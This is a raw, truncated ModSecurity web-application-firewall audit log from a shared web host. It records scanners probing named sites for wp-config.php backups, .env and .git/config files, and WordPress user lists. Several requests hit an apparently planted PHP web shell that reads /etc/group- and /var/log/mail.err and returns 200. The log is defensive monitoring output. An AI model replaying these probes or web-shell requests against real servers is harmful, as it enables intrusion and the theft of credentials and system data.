04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --9c378031-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".php.inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.inc"] [unique_id "aE3USqlFM0RY285MG1CIWAAAAAk"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".php.inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.inc"] [unique_id "aE3USqlFM0RY285MG1CIWAAAAAk"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.inc' not found or unable to stat Stopwatch: 1749931082476552 4051 (- - -) Stopwatch2: 1749931082476552 4051; combined=2475, p1=423, p2=1882, p3=0, p4=0, p5=170, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9c378031-Z-- --ee219536-A-- [15/Jun/2025:01:28:02.595645 +0530] aE3USuk-MTQZUjwklQN1KQAAAAg 185.177.72.108 57592 127.0.0.1 7081 --ee219536-B-- GET /wp-config.php.old HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ee219536-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --ee219536-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.old"] [unique_id "aE3USuk-MTQZUjwklQN1KQAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.old"] [unique_id "aE3USuk-MTQZUjwklQN1KQAAAAg"] Stopwatch: 1749931082592454 3276 (- - -) Stopwatch2: 1749931082592454 3276; combined=1870, p1=420, p2=1326, p3=0, p4=0, p5=124, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ee219536-Z-- --fb33723e-A-- [15/Jun/2025:01:28:02.710739 +0530] aE3USlj2r5sYBjRDYxhz9gAAAAU 185.177.72.108 57608 127.0.0.1 7081 --fb33723e-B-- GET /wp-config.php.save HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --fb33723e-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --fb33723e-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.save"] [unique_id "aE3USlj2r5sYBjRDYxhz9gAAAAU"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.save' not found or unable to stat Stopwatch: 1749931082707401 3413 (- - -) Stopwatch2: 1749931082707401 3413; combined=1959, p1=413, p2=1475, p3=0, p4=0, p5=71, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fb33723e-Z-- --ad9a6d26-A-- [15/Jun/2025:01:28:02.826277 +0530] aE3USjV1wc8MD9ZPjDFaHQAAAAM 185.177.72.108 57610 127.0.0.1 7081 --ad9a6d26-B-- GET /wp-config.php.swp HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ad9a6d26-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --ad9a6d26-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.swp"] [unique_id "aE3USjV1wc8MD9ZPjDFaHQAAAAM"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.swp' not found or unable to stat Stopwatch: 1749931082823029 3304 (- - -) Stopwatch2: 1749931082823029 3304; combined=1924, p1=406, p2=1460, p3=0, p4=0, p5=58, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ad9a6d26-Z-- --0f617a49-A-- [15/Jun/2025:01:28:03.099028 +0530] aE3US6xP6lni_rLDdWJbcAAAAAw 185.177.72.108 57612 127.0.0.1 7081 --0f617a49-B-- GET /wp-config.php.txt HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0f617a49-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --0f617a49-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.txt"] [unique_id "aE3US6xP6lni_rLDdWJbcAAAAAw"] Stopwatch: 1749931083095631 3453 (- - -) Stopwatch2: 1749931083095631 3453; combined=2009, p1=393, p2=1552, p3=0, p4=0, p5=64, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0f617a49-Z-- --aee9540d-A-- [15/Jun/2025:01:28:03.214599 +0530] aE3US5f90d3VSj3QpDNzigAAAAQ 185.177.72.108 57632 127.0.0.1 7081 --aee9540d-B-- GET /wp-config.php.zip HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --aee9540d-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --aee9540d-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.zip"] [unique_id "aE3US5f90d3VSj3QpDNzigAAAAQ"] Stopwatch: 1749931083211298 3356 (- - -) Stopwatch2: 1749931083211298 3356; combined=1932, p1=384, p2=1490, p3=0, p4=0, p5=58, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aee9540d-Z-- --5cfe5d65-A-- [15/Jun/2025:01:28:03.329328 +0530] aE3USyUp1gCWWDzKyjSMDgAAAAs 185.177.72.108 57642 127.0.0.1 7081 --5cfe5d65-B-- GET /wp-config.php~ HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5cfe5d65-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --5cfe5d65-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php~"] [unique_id "aE3USyUp1gCWWDzKyjSMDgAAAAs"] Stopwatch: 1749931083326334 3047 (- - -) Stopwatch2: 1749931083326334 3047; combined=1775, p1=374, p2=1345, p3=0, p4=0, p5=56, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5cfe5d65-Z-- --0178dc59-A-- [15/Jun/2025:01:28:04.652748 +0530] aE3UTOk-MTQZUjwklQN1KwAAAAg 185.177.72.108 57742 127.0.0.1 7081 --0178dc59-B-- GET /application.properties.bak HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0178dc59-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --0178dc59-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/application.properties.bak"] [unique_id "aE3UTOk-MTQZUjwklQN1KwAAAAg"] Stopwatch: 1749931084649595 3218 (- - -) Stopwatch2: 1749931084649595 3218; combined=1906, p1=346, p2=1483, p3=0, p4=0, p5=76, sr=104, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0178dc59-Z-- --2af46229-A-- [15/Jun/2025:01:30:16.750153 +0530] aE3U0PoBJ9yyMMaupYx7-AAAAAA 52.7.13.143 51564 127.0.0.1 7081 --2af46229-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc&viewfile=//etc/group- HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.7.13.143 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --2af46229-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3565 Connection: close Content-Type: text/html; charset=UTF-8 --2af46229-H-- Message: Warning. Matched phrase "etc/group" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/group found within ARGS:viewfile: /etc/group-"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/group found within ARGS:viewfile: /etc/group-"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE3U0PoBJ9yyMMaupYx7-AAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749931216745528 4677 (- - -) Stopwatch2: 1749931216745528 4677; combined=2318, p1=357, p2=1828, p3=44, p4=34, p5=55, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2af46229-Z-- --79916f72-A-- [15/Jun/2025:01:32:48.576581 +0530] aE3VaKxP6lni_rLDdWJbzwAAAAw 52.4.229.9 53744 127.0.0.1 7081 --79916f72-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=/var/log&viewfile=/var/log/mail.err HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.4.229.9 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --79916f72-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2943 Connection: close Content-Type: text/html; charset=UTF-8 --79916f72-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE3VaKxP6lni_rLDdWJbzwAAAAw"] Apache-Handler: application/x-httpd-php Stopwatch: 1749931368572983 3657 (- - -) Stopwatch2: 1749931368572983 3657; combined=1918, p1=320, p2=1471, p3=36, p4=33, p5=58, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --79916f72-Z-- --32190e44-A-- [15/Jun/2025:01:38:47.221814 +0530] aE3WzoMswQnJ3NDxjDY6RAAAAAA 143.198.155.199 56930 127.0.0.1 7081 --32190e44-B-- GET /.env HTTP/1.0 Host: support.csquaretech.com X-Real-IP: 143.198.155.199 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/127.0.2 (x64 de) Accept-Charset: utf-8 Accept-Encoding: gzip --32190e44-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.3.33 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 826 Connection: close Content-Type: text/html; charset=UTF-8 --32190e44-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "support.csquaretech.com"] [uri "/.env"] [unique_id "aE3WzoMswQnJ3NDxjDY6RAAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/support.csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749931726968916 252969 (- - -) Stopwatch2: 1749931726968916 252969; combined=2434, p1=444, p2=1915, p3=0, p4=0, p5=75, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --32190e44-Z-- --cdb08d4e-A-- [15/Jun/2025:01:43:38.258060 +0530] aE3X8obxbn4FlL1nv9zWtwAAAAs 31.171.154.56 47312 127.0.0.1 7080 --cdb08d4e-B-- GET /.git/config HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 31.171.154.56 Connection: close User-Agent: Mozilla/5.0 (compatible; Scanner/1.0) Accept: */* --cdb08d4e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --cdb08d4e-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/config"] [unique_id "aE3X8obxbn4FlL1nv9zWtwAAAAs"] Stopwatch: 1749932018255135 2968 (- - -) Stopwatch2: 1749932018255135 2968; combined=1819, p1=534, p2=1194, p3=24, p4=22, p5=45, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cdb08d4e-Z-- --3c068508-A-- [15/Jun/2025:01:47:06.012728 +0530] aE3YwSUv5qjaaXqpqCeC-gAAAAk 13.53.122.255 60340 127.0.0.1 7081 --3c068508-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.mindscan.edu.in X-Real-IP: 13.53.122.255 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: _sfs_id=0aa6b42112af1cf5937a801c10dcbd131749932218 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 --3c068508-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.mindscan.edu.in/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --3c068508-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.mindscan.edu.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.mindscan.edu.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.mindscan.edu.in"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE3YwSUv5qjaaXqpqCeC-gAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/mindscan.edu.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749932225402836 609990 (- - -) Stopwatch2: 1749932225402836 609990; combined=1867, p1=320, p2=1423, p3=0, p4=0, p5=123, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3c068508-Z-- --0457a56c-A-- [15/Jun/2025:01:48:22.012156 +0530] aE3ZDOc0EUSfg0pujcccJgAAAAU 196.251.85.177 45500 127.0.0.1 7081 --0457a56c-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.home9ine.com X-Real-IP: 196.251.85.177 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: _sfs_id=3e0b9fcb4f926ec1f7a62e3572e3d52b1749932297 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 --0457a56c-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.home9ine.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --0457a56c-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.home9ine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.home9ine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.home9ine.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE3ZDOc0EUSfg0pujcccJgAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/home9ine.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749932300260036 1752210 (- - -) Stopwatch2: 1749932300260036 1752210; combined=2283, p1=435, p2=1752, p3=0, p4=0, p5=95, sr=138, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0457a56c-Z-- --6f587f3e-A-- [15/Jun/2025:01:52:37.869764 +0530] aE3aDOE4pbluKGlX80KaFAAAAAQ 66.249.72.130 51588 127.0.0.1 7081 --6f587f3e-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 66.249.72.130 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 430 Accept-Language: en-US Content-Type: text/plain;charset=UTF-8 Cookie: _sfs_id=e4e847032c7eb51a0adcce0d554627721749932548; _fbp=fb.1.1749859200032.317710456919341929 Origin: https://www.retaxis.com Referer: https://www.retaxis.com/portfolio/auzaro-b2b-multivendor-marketplace/?mode=grid&noamp=mobile Accept: */* From: 